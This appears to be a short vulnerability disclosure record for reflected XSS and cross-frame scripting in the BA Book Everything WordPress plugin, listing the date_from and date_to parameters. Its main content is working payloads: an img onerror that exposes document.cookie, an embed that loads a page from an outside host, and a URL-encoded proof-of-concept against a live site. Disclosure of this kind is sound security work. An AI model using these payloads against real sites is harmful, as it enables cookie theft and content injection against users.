An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the BA Book Everything plugin v1.3.24 for WordPress. Vulnerable parameter(s): date_from, date_to.
[$] :: Payloads: "><!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//"> "><embed src=//ex-mi.ru/payload/xfsii.html></embed> [!] :: PoC: https://ba-booking.com/ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E
Ex.Mi
Ex.Mi
Yes
2020-11-12 (about 2 years ago)
2020-11-12 (about 2 years ago)
2020-11-14 (about 2 years ago)